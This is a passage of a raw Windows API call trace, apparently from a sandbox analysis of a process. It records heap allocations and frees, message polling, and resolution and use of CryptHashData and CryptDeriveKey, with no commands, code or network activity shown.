dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.955] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0141.955] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0141.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0141.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0141.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0141.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0141.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0141.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0141.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0141.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0141.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0141.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0141.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0141.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0141.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0141.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50c20, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0141.956] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0141.957] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0141.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0141.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0141.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0141.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0141.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0141.957] CryptHashData (hHash=0xa87350, pbData=0x2e54e68, dwDataLen=0x3, dwFlags=0x1) returned 1 [0141.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0141.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0141.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0141.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0141.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0141.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0141.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0141.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0141.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0141.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0141.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0141.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0141.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b48 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0141.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0141.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0141.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0141.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0141.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0141.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0142.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0142.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0142.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0142.155] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0142.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0142.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0142.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0142.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0142.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0142.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0142.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0142.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0142.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0142.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0142.156] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0142.156] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0142.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0142.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0142.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0142.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0142.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0142.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0142.156] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0142.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0142.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0142.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c98 [0142.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0142.157] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0142.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0142.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0142.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0142.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0142.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0142.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0142.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0142.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0142.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0142.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0142.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0142.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0142.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0142.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0142.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0142.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0142.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0142.158] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ab8 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0142.158] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0142.158] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0142.159] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0142.159] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0142.160] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0142.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0142.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0142.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0142.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0142.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0142.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0142.161] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50ad0 [0142.161] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50ad0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0142.218] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0142.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0142.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0142.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0142.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0142.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0142.219] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87350, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa86f90) 